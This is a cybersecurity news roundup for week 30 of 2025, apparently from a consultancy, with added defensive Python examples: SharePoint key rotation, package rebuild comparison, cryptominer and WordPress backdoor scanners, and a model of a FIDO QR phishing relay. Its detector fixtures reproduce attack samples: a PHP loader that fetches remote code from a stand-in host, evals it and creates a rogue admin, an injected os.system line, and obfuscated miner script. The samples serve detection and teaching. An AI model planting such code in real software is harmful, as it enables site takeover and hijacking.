Week 30 of 2025 saw a surge in cybersecurity developments spanning policy, infrastructure vulnerabilities, advanced threat campaigns and law enforcement action.
The UK took a firm stance on ransomware by introducing a public sector payment ban and mandatory reporting requirements, aiming to break the financial incentives behind these attacks.
Meanwhile, a critical zero-day vulnerability in on-premises Microsoft SharePoint Server is being actively exploited, prompting urgent patching and mitigation. Google unveiled its OSS Rebuild initiative, which independently rebuilds open-source packages to detect supply chain tampering.
On the threat actor front, over 3,500 websites were hijacked for a stealthy JavaScript-based crypto-mining campaign, and a phishing group dubbed PoisonSeed found a way to bypass FIDO-based MFA by abusing the QR-based cross-device sign-in flow.
WordPress users also face new risks, with attackers using the mu-plugins directory to implant persistent backdoors that ordinary plugin checks overlook.
In a significant win for global cybercrime enforcement, Europol arrested the admin of the XSS.is forum in Kyiv, disrupting one of the longest running Russian language cybercrime marketplaces.
Read the full breakdown below to explore key incidents, emerging threats and the latest defensive strategies shaping cybersecurity in Week 30 of 2025.
UK Introduces Tough Ransomware Measures for Public and Private Sectors
The UK government, via the National Cyber Security Centre and Home Office, has unveiled a robust package of ransomware regulations following public consultation.
Under these new rules, public sector bodies and critical national infrastructure, including the NHS, local councils and schools, will be barred from paying ransom demands.
Private sector businesses will be required to notify authorities before paying a ransom, so that they can receive guidance on the legal and safety implications. In addition, a mandatory incident reporting regime is being introduced to give law enforcement the intelligence it needs to support victims and disrupt ransomware operations.
The initiative aims to dismantle the ransomware business model, enhance resilience through backups and incident-preparation plans, and build on the government's broader "Plan for Change" strategy.
Critical Actively Exploited Vulnerability Affects Microsoft SharePoint
The NCSC has issued an urgent advisory regarding two vulnerabilities in on-premises Microsoft SharePoint Server, most notably CVE-2025-53770, a critical deserialisation flaw (CVSS 9.8) affecting SharePoint Enterprise Server 2016, SharePoint Server 2019 and SharePoint Subscription Edition. The flaw allows unauthenticated remote code execution over the network and is confirmed to be exploited in the wild. SharePoint Online in Microsoft 365 is not affected.
A second flaw, CVE-2025-53771 (CVSS 6.5), permits path traversal and spoofing; at the time of the advisory it had not been observed being exploited.
Microsoft is preparing a comprehensive update for CVE-2025-53770. In the meantime, organisations are urged to apply the available mitigations: run only supported versions, enable AMSI integration with Defender Antivirus (or an equivalent AV) running, deploy endpoint detection and response, rotate the ASP.NET machine keys and restart IIS, and, where AMSI cannot be enabled, disconnect SharePoint servers from the internet. Key rotation matters even on patched hosts: an attacker who has already exploited the flaw may have read the keys and could keep minting validly signed requests until they change.
The NCSC stresses immediate action to reduce the risk of compromise.
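Why "rotate the machine keys" is on the mitigation list, as an added illustration (not Microsoft code, and a deliberate simplification of ASP.NET ViewState: the real format, serializer and key derivation differ). The model signs serialized state with an HMAC under a machine key; whoever holds the key can mint state the server will deserialize as trusted, and only a key change invalidates what they have minted.

```python
# Added illustration (not Microsoft code): a simplified model of MAC-protected
# serialized state such as ASP.NET ViewState. An attacker holding the
# validation key can sign arbitrary serialized state; rotating the key is what
# stops that, which is why the advisory lists it alongside patching.
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional

TAG_LEN = hashlib.sha256().digest_size  # 32 bytes


def sign_state(state: dict, machine_key: bytes) -> str:
    """Serialize `state` and append an HMAC-SHA256 tag under `machine_key`."""
    body = json.dumps(state, sort_keys=True).encode()
    tag = hmac.new(machine_key, body, hashlib.sha256).digest()
    return base64.b64encode(body + tag).decode()


def verify_state(blob: str, machine_key: bytes) -> Optional[dict]:
    """Return the deserialized state if the tag verifies under `machine_key`, else None."""
    raw = base64.b64decode(blob)
    if len(raw) <= TAG_LEN:
        return None
    body, tag = raw[:-TAG_LEN], raw[-TAG_LEN:]
    expected = hmac.new(machine_key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None  # never deserialize input whose MAC does not verify
    return json.loads(body)


def rotation_demo() -> dict:
    """Show what a leaked key buys an attacker, and what rotation takes away."""
    old_key = secrets.token_bytes(64)
    # An attacker who obtained old_key (for example by reading it off a
    # compromised server) can mint state of their choosing; the MAC verifies.
    forged = sign_state({"payload": "attacker-chosen object graph"}, old_key)
    accepted_before = verify_state(forged, old_key) is not None

    # Rotating to a fresh key invalidates every blob signed under the old one,
    # including anything the attacker pre-computed.
    new_key = secrets.token_bytes(64)
    accepted_after = verify_state(forged, new_key) is not None

    # A blob altered after signing fails under either key.
    raw = bytearray(base64.b64decode(forged))
    raw[0] ^= 0x01
    tampered = base64.b64encode(bytes(raw)).decode()
    tampered_accepted = verify_state(tampered, old_key) is not None

    return {
        "accepted_before_rotation": accepted_before,
        "accepted_after_rotation": accepted_after,
        "tampered_accepted": tampered_accepted,
    }


if __name__ == "__main__":
    print(rotation_demo())
```

In the real product the keys live in web.config and the SharePoint configuration, and a rotation has to reach every server in the farm, which is why the step is paired with restarting IIS.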
Google Launches OSS Rebuild to Detect Malicious Code in Open-Source Packages
On July 23rd, Google's Open Source Security Team introduced OSS Rebuild, an initiative that strengthens open-source ecosystems by independently rebuilding packages from PyPI (Python), npm (JavaScript) and crates.io (Rust) and checking that the rebuilt artifact matches what was published.
By generating transparent build metadata through a declarative build process aligned with the SLSA framework, OSS Rebuild lets security teams spot packages whose published contents do not match their source, without placing any burden on upstream maintainers.
Google noted that the goal is to give organisations deeper understanding and control of their software supply chains, reducing the risk of supply chain attacks on widely used dependencies.
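The core check behind rebuild-and-compare, as an added example in the spirit of OSS Rebuild (not Google's code, and no claim about OSS Rebuild's internals). Two builds of the same source legitimately differ in timestamps and ownership metadata, so a whole-file checksum is not enough; the comparison below walks the archive member by member and reports only content differences. The package, source tree and tampering are constructed.

```python
# Added example in the spirit of OSS Rebuild; not Google's code. Compares a
# published archive with an independently rebuilt one file by file, ignoring
# build-time metadata so that only content differences are reported.
import hashlib
import io
import tarfile


def make_tarball(files: dict, mtime: int) -> bytes:
    """Build an in-memory .tar.gz from {path: bytes}; stands in for a build step."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, data in sorted(files.items()):
            info = tarfile.TarInfo(path)
            info.size = len(data)
            info.mtime = mtime  # metadata that legitimately varies between builds
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def content_digests(tar_bytes: bytes) -> dict:
    """Map each regular file in the archive to the SHA-256 of its contents."""
    digests = {}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile():
                data = tar.extractfile(member).read()
                digests[member.name] = hashlib.sha256(data).hexdigest()
    return digests


def compare_artifacts(published: bytes, rebuilt: bytes) -> dict:
    """Diff two archives by file content; any difference is a reason to distrust `published`."""
    pub, reb = content_digests(published), content_digests(rebuilt)
    return {
        "identical": pub == reb,
        "modified": sorted(n for n in pub.keys() & reb.keys() if pub[n] != reb[n]),
        "only_in_published": sorted(pub.keys() - reb.keys()),
        "only_in_rebuilt": sorted(reb.keys() - pub.keys()),
    }


# Constructed source tree of a hypothetical package.
SOURCE = {
    "pkg/__init__.py": b"VERSION = '1.0.0'\n",
    "pkg/core.py": b"def run():\n    return 'ok'\n",
}


def demo() -> dict:
    rebuilt = make_tarball(SOURCE, mtime=0)             # rebuilt from source, deterministically
    honest = make_tarball(SOURCE, mtime=1_700_000_000)  # maintainer's upload, built at another time
    # Tampered upload: upstream source is unchanged, but the registry artifact
    # carries an injected line and an extra file (constructed, inert text).
    tampered_src = dict(SOURCE)
    tampered_src["pkg/core.py"] += b"import os\nos.system('id')  # injected, not in the source repo\n"
    tampered_src["pkg/_helper.py"] = b"# file absent from the source repository\n"
    tampered = make_tarball(tampered_src, mtime=1_700_000_000)
    return {
        # Byte-for-byte hashes differ even for the honest build, which is why a
        # plain checksum comparison against a local rebuild is not enough.
        "whole_file_hash_matches": hashlib.sha256(honest).digest() == hashlib.sha256(rebuilt).digest(),
        "honest": compare_artifacts(honest, rebuilt),
        "tampered": compare_artifacts(tampered, rebuilt),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=2))
```

Real rebuild pipelines have to normalise more than mtimes (compiler output, archive ordering, generated files), which is where a declarative, recorded build definition earns its keep; the comparison step itself stays this simple.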
Over 3,500 Websites Hijacked for Stealthy JavaScript Crypto-Mining Campaign
A widespread attack has compromised more than 3,500 websites globally, injecting obfuscated JavaScript miners into their pages.
The campaign revives browser-based cryptojacking: the injected code talks to its backend over WebSockets, assesses the device's capabilities, spawns background Web Workers and adjusts mining intensity dynamically, throttling resource usage so that neither users nor security tools notice.
Notably, the domains serving these miners have also been linked to Magecart credit card skimmers, suggesting the attackers are diversifying payloads to combine covert mining with payment data theft.
This stealthy, multi-pronged approach reflects a threat model that pursues both computational and financial gain from the same foothold.
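A detection angle on the traits described above, as an added example (not code from the researchers who reported the campaign). Any one trait, such as a WebSocket or a Web Worker, is ordinary in benign front-end code, so the scanner below scores how many distinct categories a script combines rather than matching a single signature. The category names and thresholds are our own; the three sample scripts are constructed, inert, and contain no mining logic.

```python
# Added example, not the researchers' code: a static heuristic scanner for the
# combination of traits described in the campaign write-up. It is the
# co-occurrence that is suspicious, so it counts categories, not matches.
import re

# Each category is a regex over script text; names are our own labels.
TRAITS = {
    "websocket": re.compile(r"\bnew\s+WebSocket\s*\("),
    "web_worker": re.compile(r"\bnew\s+Worker\s*\("),
    "capability_probe": re.compile(r"navigator\.(hardwareConcurrency|deviceMemory)\b"),
    "visibility_throttle": re.compile(r"visibilitychange|document\.(hidden|visibilityState)\b|requestIdleCallback"),
    "obfuscation": re.compile(r"\b(eval|atob|unescape)\s*\(|String\.fromCharCode|\\x[0-9a-fA-F]{2}"),
    "mining_vocabulary": re.compile(r"\b(nonce|difficulty|hashrate|job_id|stratum)\b", re.I),
}
FLAG_THRESHOLD = 4  # distinct categories needed before a script is flagged


def scan_script(js: str) -> dict:
    """Score one script; `hits` lists the categories present, sorted by name."""
    hits = sorted(name for name, rx in TRAITS.items() if rx.search(js))
    return {"score": len(hits), "hits": hits, "flagged": len(hits) >= FLAG_THRESHOLD}


# Constructed samples: two benign scripts and one that combines every trait.
SAMPLES = {
    # Benign: a chat widget uses a WebSocket and nothing else.
    "chat_widget.js": """
        const ws = new WebSocket("wss://chat.example/socket");
        ws.onmessage = (e) => renderMessage(JSON.parse(e.data));
    """,
    # Benign: an image tool sizes its worker pool by core count.
    "image_resizer.js": """
        const cores = navigator.hardwareConcurrency || 2;
        const pool = Array.from({length: cores}, () => new Worker("/js/resize-worker.js"));
    """,
    # Suspicious: every trait at once, with the hex-escaped string table that
    # obfuscators emit. Inert; the worker body decodes to "// placeholder".
    "injected.js": r"""
        var _0x4f=["\x77\x73\x73\x3a\x2f\x2f\x70\x6f\x6f\x6c\x2e\x65\x78\x61\x6d\x70\x6c\x65"];
        var n=navigator.hardwareConcurrency||1,w=[];
        for(var i=0;i<n;i++){w.push(new Worker(URL.createObjectURL(new Blob([atob("Ly8gcGxhY2Vob2xkZXI=")]))));}
        var s=new WebSocket(_0x4f[0]);
        s.onmessage=function(m){var j=JSON.parse(m.data);w[0].postMessage({nonce:j.nonce,difficulty:j.target});};
        document.addEventListener("visibilitychange",function(){var t=document.hidden?0.9:0.35;w.forEach(function(x){x.postMessage({throttle:t});});});
    """,
}


def scan_all(samples: dict = SAMPLES) -> dict:
    """Scan every sample and return {name: result}."""
    return {name: scan_script(js) for name, js in samples.items()}


if __name__ == "__main__":
    for name, result in scan_all().items():
        print(name, result)
```

Run the same function over the scripts a crawler pulls from your own pages, or over a CDN's response bodies, and treat a flagged script as a starting point for manual review rather than a verdict: minified legitimate code can trip the obfuscation category, and the threshold is a tuning knob, not a constant.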
PoisonSeed Phishing Abuses QR-Based FIDO Cross-Device Flow to Bypass Security Keys
Cybersecurity researchers have identified a phishing campaign by the threat actor PoisonSeed that sidesteps FIDO2 security keys by abusing the cross-device sign-in feature, in which a QR code lets a user complete authentication with an authenticator on another device.
Victims are lured to a spoofed login portal (Okta branding was observed), and the credentials they enter are relayed in real time to the genuine login page, where the attacker selects cross-device sign-in and receives a legitimate QR code. That QR code is captured and displayed on the fake site. When the victim scans it with the authenticator app on their phone, the sign-in completes for the session that requested the QR code, which is the attacker's browser, giving the attacker access without the FIDO key itself ever being used or compromised.
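The flow above as a small protocol model, added here as an illustration (not the researchers' code, and a deliberate simplification of WebAuthn and the FIDO hybrid QR transport; the origins are hypothetical look-alikes). It isolates the property that makes the relay work: a direct WebAuthn assertion carries the origin of the browser that requested it, so a phishing origin is rejected by the relying party, whereas the QR payload carries only a session identifier, so the phone cannot tell that the image was re-displayed on a phishing page and the relying party authenticates whichever browser session originally asked for the code.

```python
# Added example modelling the relay described above; not the researchers' code
# and not a faithful WebAuthn/hybrid-transport implementation. Origins are
# hypothetical.
import secrets

RP_ORIGIN = "https://login.example-corp.example"        # hypothetical genuine IdP
PHISH_ORIGIN = "https://login.example-corp-sso.example"  # hypothetical look-alike


class RelyingParty:
    """Minimal IdP: checks direct assertions by origin and tracks QR sessions."""

    def __init__(self):
        self.qr_sessions = {}  # session_id -> browser session that requested the QR

    def verify_direct(self, assertion: dict) -> bool:
        # Direct WebAuthn: the browser writes its own origin into clientDataJSON
        # and the authenticator signs over it, so the RP can refuse other origins.
        return assertion["origin"] == RP_ORIGIN

    def start_cross_device(self, browser_session: str) -> str:
        # The QR payload encodes a session/tunnel identifier (modelled as a random
        # token), not the page on which it is displayed.
        session_id = secrets.token_hex(8)
        self.qr_sessions[session_id] = browser_session
        return f"FIDO:/{session_id}"

    def complete_cross_device(self, phone_response: dict):
        session_id = phone_response["session_id"]
        owner = self.qr_sessions.pop(session_id, None)
        if owner is None or not phone_response["user_verified"]:
            return None
        return {"authenticated_session": owner}


def phone_scans(qr_payload: str) -> dict:
    # The authenticator app parses the QR, verifies the user (PIN/biometric) and
    # answers the relying party. Nothing in the payload names a web origin.
    return {"session_id": qr_payload.split("/", 1)[1], "user_verified": True}


def direct_phish_attempt(rp: RelyingParty) -> bool:
    # Victim uses the security key directly on the phishing page: the victim's
    # browser stamps PHISH_ORIGIN into the assertion and the RP refuses it.
    return rp.verify_direct({"origin": PHISH_ORIGIN, "signature": "<valid over phishing origin>"})


def cross_device_relay(rp: RelyingParty) -> dict:
    # 1. Attacker, logged half-way in on the real site with the relayed password,
    #    picks "sign in with another device" and receives a genuine QR payload.
    qr = rp.start_cross_device(browser_session="attacker-browser")
    # 2. The attacker renders the same payload on the phishing page. It is just
    #    an image; nothing binds it to the page that displays it.
    shown_on_phish = qr
    # 3. The victim scans it with the authenticator app on their phone.
    response = phone_scans(shown_on_phish)
    # 4. The RP completes sign-in for whichever session requested the QR.
    return rp.complete_cross_device(response)


if __name__ == "__main__":
    rp = RelyingParty()
    print("direct use of key on phishing page accepted:", direct_phish_attempt(rp))
    print("cross-device relay result:", cross_device_relay(rp))
```

The toy omits the proximity signal the real hybrid transport specifies (the phone advertises over Bluetooth and the client must hear it); how strictly a deployment enforces that, and whether it allows the QR fallback at all, is what decides how far the relay works from the victim.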
Europol Apprehends XSS.is Admin, Shutting Down 50K-User Cybercrime Hub
Europol, French police and Ukrainian authorities have arrested, in Kyiv, the suspected administrator of XSS.is, a notorious Russian-language cybercrime forum formerly known as DaMaGeLaB.
Operating since 2013 with over 50,000 registered users, XSS.is facilitated the sale of stolen data, hacking tools, ransomware services, escrow dispute services and encrypted messaging via its own Jabber server.
Law enforcement seized the forum's clearnet domain, which now displays a seizure notice from France's cybercrime unit alongside Ukraine's SBU Cyber Department.
The administrator is believed to have earned around €7 million through advertising and transaction fees and was tied to additional platforms like thesecure.biz.
Hackers Insert Stealth Backdoor into WordPress "mu-plugins"
Security researchers at Sucuri have uncovered a stealthy backdoor embedded within the "must-use" (mu-plugins) directory on compromised WordPress sites.
Unlike regular plugins, mu-plugins load automatically, cannot be deactivated from the dashboard and do not appear in the regular plugin list (only under a separate Must-Use tab), which lets the backdoor stay out of sight.
The malicious wp-index.php loader fetches a ROT13-obfuscated remote payload, stores it in the WordPress database, injects a hidden file manager, creates a rogue administrator account named "officialwp" and activates a further malicious plugin to ensure persistence.
If the rogue account is removed, the loader re-creates it and resets its password. The result is full remote PHP code execution, usable for defacement or malware distribution, without triggering plugin-based detections that only inspect the regular plugins directory.
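A check a site owner can run against the behaviours described above, as an added example (not Sucuri's code). It walks wp-content/mu-plugins and scores each PHP file for the indicators the report lists: a remote fetch, ROT13 or base64 decoding, eval, administrator creation, the "officialwp" username, activation of further plugins and the wp-index.php loader name. One indicator is weak evidence, so a file is reported only when two or more coincide. The two fixture files are constructed and inert; the signature names and threshold are our own.

```python
# Added example, not Sucuri's code: scans wp-content/mu-plugins for the
# combination of behaviours described in the report. Fixtures are constructed.
import re
import tempfile
from pathlib import Path

SIGNATURES = {
    "remote_fetch": re.compile(r"\b(file_get_contents|curl_init|wp_remote_get|fopen)\s*\(\s*['\"]https?://", re.I),
    "rot13_decode": re.compile(r"\bstr_rot13\s*\(", re.I),
    "base64_decode": re.compile(r"\bbase64_decode\s*\(", re.I),
    "dynamic_code": re.compile(r"\b(eval|create_function)\s*\(|\bassert\s*\(\s*\$", re.I),
    "admin_creation": re.compile(r"\b(wp_insert_user|wp_create_user|wp_set_password)\s*\(", re.I),
    "known_username": re.compile(r"officialwp", re.I),
    "plugin_activation": re.compile(r"\bactivate_plugin\s*\(", re.I),
}
KNOWN_LOADER_NAMES = {"wp-index.php"}
REPORT_THRESHOLD = 2


def scan_mu_plugins(mu_dir: Path) -> list:
    """Return one finding per PHP file carrying at least REPORT_THRESHOLD indicators."""
    findings = []
    for path in sorted(mu_dir.rglob("*.php")):
        code = path.read_text(errors="replace")
        hits = [name for name, rx in SIGNATURES.items() if rx.search(code)]
        if path.name in KNOWN_LOADER_NAMES:
            hits.append("known_loader_name")
        if len(hits) >= REPORT_THRESHOLD:
            findings.append({"file": path.relative_to(mu_dir).as_posix(), "hits": hits})
    return findings


# Constructed fixtures: a legitimate mu-plugin, and a loader that mirrors the
# reported behaviours as text only (nothing here is executed).
BENIGN = """<?php
/* Plugin Name: Disable XML-RPC */
add_filter('xmlrpc_enabled', '__return_false');
"""
LOADER = """<?php
$raw = file_get_contents('https://cdn.example/payload.txt');
$code = str_rot13($raw);
update_option('_site_cache_blob', $code);   // stash the payload in the database
eval($code);                                // hidden file manager and friends
if (!username_exists('officialwp')) {
    wp_insert_user(['user_login' => 'officialwp', 'user_pass' => 'x', 'role' => 'administrator']);
}
activate_plugin('site-tools/site-tools.php');
"""


def demo() -> list:
    """Lay the fixtures out like a real install and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        mu = Path(tmp) / "wp-content" / "mu-plugins"
        mu.mkdir(parents=True)
        (mu / "disable-xmlrpc.php").write_text(BENIGN)
        (mu / "wp-index.php").write_text(LOADER)
        return scan_mu_plugins(mu)


if __name__ == "__main__":
    for finding in demo():
        print(finding["file"], "->", ", ".join(finding["hits"]))
```

On a live site, point scan_mu_plugins at the real wp-content/mu-plugins path; WP-CLI's wp plugin list --status=must-use gives the same inventory from WordPress's side, and any file in that directory you did not put there deserves a look regardless of score, since mu-plugins execute on every request.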
If you would like to discover how Secora Consulting can assist you in keeping your business secure, please get in touch.